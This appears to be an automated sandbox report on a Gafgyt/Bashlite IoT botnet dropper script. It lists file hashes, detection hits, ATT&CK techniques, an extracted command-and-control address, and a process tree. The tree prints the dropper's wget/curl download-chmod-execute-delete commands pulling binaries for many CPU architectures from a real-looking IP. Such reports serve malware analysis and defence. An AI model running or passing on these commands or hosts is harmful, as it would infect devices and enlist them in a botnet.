gafgyt | 4968ba801674176e9d07c54ed20f199c123ece3c0c4082ee35a3ff4d7ee00471

Analysis

max time kernel
62s
max time network
64s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
03-02-2025 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

1KB
MD5

202fafde5b2c6cd0b2548109a608c775
SHA1

8872cccf4cfe65381ec53cebf811e1b8e7d11cd5
SHA256

4968ba801674176e9d07c54ed20f199c123ece3c0c4082ee35a3ff4d7ee00471
SHA512

3c3f2e2d23ce7e19840c7bfb03d1f105d226cda0e59eee1fd8350f1b91002ac785d79a168acb22e3bd99ef180ae0f6e79905804a120dd7b078601e5d24656413

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

185.237.15.131:666

Signatures

Detected Gafgyt variant 12 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_gafgyt
behavioral3/files/fstream-3.dat	family_gafgyt
behavioral3/files/fstream-5.dat	family_gafgyt
behavioral3/files/fstream-7.dat	family_gafgyt
behavioral3/files/fstream-9.dat	family_gafgyt
behavioral3/files/fstream-11.dat	family_gafgyt
behavioral3/files/fstream-13.dat	family_gafgyt
behavioral3/files/fstream-15.dat	family_gafgyt
behavioral3/files/fstream-17.dat	family_gafgyt
behavioral3/files/fstream-19.dat	family_gafgyt
behavioral3/files/fstream-21.dat	family_gafgyt
behavioral3/files/fstream-23.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
820	chmod
838	chmod
843	chmod
858	chmod
868	chmod
775	chmod
815	chmod
833	chmod
848	chmod
853	chmod
863	chmod
791	chmod
825	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/run/jackmymips	776	bins.sh
/run/jackmymipsel	793	bins.sh
/run/jackmysh4	816	bins.sh
/run/jackmyx86	821	bins.sh
/run/jackmyarmv6	826	bins.sh
/run/jackmyi686	834	bins.sh
/run/jackmypowerpc	839	bins.sh
/run/jackmyi586	844	bins.sh
/run/jackmym86k	849	bins.sh
/run/jackmysparc	854	bins.sh
/run/jackmyarmv4	859	bins.sh
/run/jackmyarmv5	864	bins.sh
/run/jackmypowerpc440	869	bins.sh

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 8 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
776	jackmymips
777	rm
778	wget
779	curl
793	jackmymipsel
794	rm
706	wget
754	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:702
- /usr/bin/wget
  wget http://103.130.214.198/jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:706
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmymips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:754
- /bin/chmod
  chmod +x jackmymips
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /run/jackmymips
  ./jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:776
- /bin/rm
  rm -rf jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:777
- /usr/bin/wget
  wget http://103.130.214.198/jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:778
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmymipsel
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:779
- /bin/chmod
  chmod +x jackmymipsel
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /run/jackmymipsel
  ./jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:793
- /bin/rm
  rm -rf jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:794
- /usr/bin/wget
  wget http://103.130.214.198/jackmysh4
  2⤵
  PID:795
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmysh4
  2⤵
  - Reads runtime system information
  PID:814
- /bin/chmod
  chmod +x jackmysh4
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /run/jackmysh4
  ./jackmysh4
  2⤵
  PID:816
- /bin/rm
  rm -rf jackmysh4
  2⤵
  PID:817
- /usr/bin/wget
  wget http://103.130.214.198/jackmyx86
  2⤵
  PID:818
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyx86
  2⤵
  - Reads runtime system information
  PID:819
- /bin/chmod
  chmod +x jackmyx86
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /run/jackmyx86
  ./jackmyx86
  2⤵
  PID:821
- /bin/rm
  rm -rf jackmyx86
  2⤵
  PID:822
- /usr/bin/wget
  wget http://103.130.214.198/jackmyarmv6
  2⤵
  PID:823
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyarmv6
  2⤵
  - Reads runtime system information
  PID:824
- /bin/chmod
  chmod +x jackmyarmv6
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /run/jackmyarmv6
  ./jackmyarmv6
  2⤵
  PID:826
- /bin/rm
  rm -rf jackmyarmv6
  2⤵
  PID:830
- /usr/bin/wget
  wget http://103.130.214.198/jackmyi686
  2⤵
  PID:831
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyi686
  2⤵
  - Reads runtime system information
  PID:832
- /bin/chmod
  chmod +x jackmyi686
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /run/jackmyi686
  ./jackmyi686
  2⤵
  PID:834
- /bin/rm
  rm -rf jackmyi686
  2⤵
  PID:835
- /usr/bin/wget
  wget http://103.130.214.198/jackmypowerpc
  2⤵
  PID:836
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmypowerpc
  2⤵
  - Reads runtime system information
  PID:837
- /bin/chmod
  chmod +x jackmypowerpc
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /run/jackmypowerpc
  ./jackmypowerpc
  2⤵
  PID:839
- /bin/rm
  rm -rf jackmypowerpc
  2⤵
  PID:840
- /usr/bin/wget
  wget http://103.130.214.198/jackmyi586
  2⤵
  PID:841
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyi586
  2⤵
  - Reads runtime system information
  PID:842
- /bin/chmod
  chmod +x jackmyi586
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /run/jackmyi586
  ./jackmyi586
  2⤵
  PID:844
- /bin/rm
  rm -rf jackmyi586
  2⤵
  PID:845
- /usr/bin/wget
  wget http://103.130.214.198/jackmym86k
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmym86k
  2⤵
  - Reads runtime system information
  PID:847
- /bin/chmod
  chmod +x jackmym86k
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /run/jackmym86k
  ./jackmym86k
  2⤵
  PID:849
- /bin/rm
  rm -rf jackmym86k
  2⤵
  PID:850
- /usr/bin/wget
  wget http://103.130.214.198/jackmysparc
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmysparc
  2⤵
  - Reads runtime system information
  PID:852
- /bin/chmod
  chmod +x jackmysparc
  2⤵
  - File and Directory Permissions Modification
  PID:853
- /run/jackmysparc
  ./jackmysparc
  2⤵
  PID:854
- /bin/rm
  rm -rf jackmysparc
  2⤵
  PID:855
- /usr/bin/wget
  wget http://103.130.214.198/jackmyarmv4
  2⤵
  PID:856
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyarmv4
  2⤵
  - Reads runtime system information
  PID:857
- /bin/chmod
  chmod +x jackmyarmv4
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /run/jackmyarmv4
  ./jackmyarmv4
  2⤵
  PID:859
- /bin/rm
  rm -rf jackmyarmv4
  2⤵
  PID:860
- /usr/bin/wget
  wget http://103.130.214.198/jackmyarmv5
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmyarmv5
  2⤵
  - Reads runtime system information
  PID:862
- /bin/chmod
  chmod +x jackmyarmv5
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /run/jackmyarmv5
  ./jackmyarmv5
  2⤵
  PID:864
- /bin/rm
  rm -rf jackmyarmv5
  2⤵
  PID:865
- /usr/bin/wget
  wget http://103.130.214.198/jackmypowerpc440
  2⤵
  PID:866
- /usr/bin/curl
  curl -O http://103.130.214.198/jackmypowerpc440
  2⤵
  - Reads runtime system information
  PID:867
- /bin/chmod
  chmod +x jackmypowerpc440
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /run/jackmypowerpc440
  ./jackmypowerpc440
  2⤵
  PID:869
- /bin/rm
  rm -rf jackmypowerpc440
  2⤵
  PID:870

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/jackmyarmv4

Filesize
121KB

MD5
0a405ebd5dbfda473cb4ea67fb11022e

SHA1
63aa1adc69cfa659eaef618a13b237a5ba99c676

SHA256
25be6a0e7a281425036ca5e32f41044d267f9ce9e7734199e07d47d35ff71329

SHA512
cf715da52e6c708d305b45074816759654380d16ae9fd4256fb7922b5a1eeec3b9c02207b93bcf86be484d4392538f1cb27600da376da04751ad6b237d3d7956

Download Submit
/run/jackmyarmv5

Filesize
114KB

MD5
16c719f948532703e99acccf76d2faa3

SHA1
b44cd1659fce47ccc079c07f9b034ef482985ffe

SHA256
ce5da3d0daaa7d8f9ec0ea62ead3fb5a110ec1a6a58cd4229c653883c4d81a84

SHA512
a34f80b6dac32d05a36ddaf7664275d72f1875f658cf05c524583265aea4e25fdf34fdd3c6b3b0a92bc07ed4421b985a0309cafcd2fee07dae570c752fdbc98f

Download Submit
/run/jackmyarmv6

Filesize
135KB

MD5
5e4a03f668b36cf458db8120f5fd61a2

SHA1
3c832a0bc244fbf28b7972025c1cc3a6e20e96a1

SHA256
a79e47302aaceccefa752bc0311c60faf0585c9b27e14c8d8c927d476faee724

SHA512
98cf5a25c3422e6bfd7371805f2167ec1da9c4d69ef13d5825bade1142e087f34aed3e73d11904b99334a7d816e56d7a390db316b12e42bddee90dcd2b0a77a8

Download Submit
/run/jackmyi586

Filesize
93KB

MD5
2eead00e32c17e8a8b42ae0bd5657b96

SHA1
f2fd0a91faf84ad1a1667d37203d08d30f68a52c

SHA256
e4268bb0b926afb0def833f91ca73145fd6465f38b64215277b9a473c7902c33

SHA512
f6d2be735f54fae4c99e1f3fbc2eaa9a632dfc1e162cf84cb539fab68a0858d40b4dc3f8cf0b9609d5af3ad6f3a8e8f8353ec2184770ecefc974069d7e7dc35e

Download Submit
/run/jackmyi686

Filesize
93KB

MD5
608f6186183cc60ee980a3c61ed75657

SHA1
11ff1ae027e903b8346dc96ee3efe89b51a8a870

SHA256
4e2dc2ac640b9a450cabc34f024b66dd02c28ba4ff7553e92e2da05542c9334f

SHA512
5be2f66fe54bd27cd37256b28fc6a9906c4c30c87ecb766a4dc3de0c5a0b0d328879541328b623a094e744a28d167e2bceeafade98cbc7bf4ef26ded06da8217

Download Submit
/run/jackmym86k

Filesize
111KB

MD5
8c4076716dc9b9d376b81ee1f9553882

SHA1
b192fac381d8f5883934217e51b04c71a7bb5b6b

SHA256
89df86cca67c48fc5a983b1fd52ce51220b43abbd9eec78ae1a72eebd6cf8995

SHA512
42fc2233dcdbd2ffbce29e81cc8319d3bdcd659eef73f0c3f47937954a7fa55c3477955fb817004cda3376586e151c9fddd14d13543929cd806bc74823652d18

Download Submit
/run/jackmymips

Filesize
141KB

MD5
f07907753da39138058eefc527185ac0

SHA1
bf6af9d8c1fbff0f48e73427f887194a02aac844

SHA256
b0ec23f3a680be657e03be5bf279c1f99f12ee356f05bbefd2b562cb92c78d3a

SHA512
224149662ee0dfcc0a008436812479f643f7f10bba3d44be7619a7cf33810327e0ec763ada8a4f3647a575ea962789fc0ec1ee13d48d07e08054abad4930d657

Download Submit
/run/jackmymipsel

Filesize
141KB

MD5
a66621dce8bb5463b936b6650d52f918

SHA1
24a1a2af65d9e4b453439e013d360059f21c555a

SHA256
6e3f0a5bd00e6e610efdb0a784354141b44be5055733c68fd6a036f689f9ab03

SHA512
5b4ae51f4d7e7494c97286bf762deb60a088ad72ea6d5c55f11715e22124e08ba285f13d5156ecc32cf3547913ddee1cd6336265a352ff3174bd7edb96640c9e

Download Submit
/run/jackmypowerpc

Filesize
106KB

MD5
e02d5792cbcfba013b77203f049e8d48

SHA1
0659308f6099fcca6d5ac0783f976989f3c0464f

SHA256
47761f435515620e8296b30add528960578ab073a0f52cf1021c9901ceb97d09

SHA512
9d57d98bd0b3f8ada78cd684720b0902cead9fc7f1677f9ec2351362f0387fcfdd06b8f0e13a053684c5324912b946df4d4dd807d4d92130d7ee1d68729ab066

Download Submit
/run/jackmypowerpc440

Filesize
277B

MD5
b7c50906aa8e85fda2d066ef8233139f

SHA1
078fb1bb7f7406e6f2155269d3efd7c1639b8364

SHA256
1e663810ae33c04c25c7bf335c8790cdc6175f73eb69d45e88fd5e0fb8393ced

SHA512
5078f5f4c2276c998de41ce4a018511e35d2201ed4c12aa95157b2d36463b4ecad8be5a51a73e68ac157dfdeb67dadcd15db82c51ac9b9e1af3ed29bd2443a10

Download Submit
/run/jackmysh4

Filesize
102KB

MD5
6f1ea26027b8cd717ebb66dbef209df1

SHA1
1129623c2228408347c84b117db72fe08e0fe551

SHA256
e28b719b64201c9235e2640bd877d86884c1b6e031a9dc536bcb977ba82a61e7

SHA512
be9d639b58cdf72e081cd001c81b718c22d9af482258c2bef75fd7562d4256dc1fb15466b725ba5f37ef19cdf3d00dd4ebf5e46915249b5e2cbbd90c4aca1dc2

Download Submit
/run/jackmysparc

Filesize
119KB

MD5
6288cc9f37ea265a1598737fda5ccc1a

SHA1
7b811ae42216a24eda07dc6f448329519823427b

SHA256
8549c5ef4adf358f75339db4241d2a20a3782d21fcc4e2f6a7d06b8d8e886196

SHA512
feaa5b1ccc2d4e8f408011a01095d7f9b759ef6a92950e9fcfd8fd89d28aac98b870b0c9950e649e491a6f1e97483fce5945fab4efceebae4cfb2965216c49b1

Download Submit
/run/jackmyx86

Filesize
114KB

MD5
3653915d5fde38c3a942c8f7f2ee3db7

SHA1
ed26dc0db47db555fd502c252c795e23421e3e6e

SHA256
df374e54f910df6ee0a31fe202876fb2eaec5f8e752eb4e2d067f2ea188a56b8

SHA512
d4349385c308773c64042ef265a470bdb8272da2ab3b19036acc63a064e9bf22915975d2016a59b1d4c46ae4152f8864d3153f041e9e96cb4b122ca9f3f18cc3

Download Submit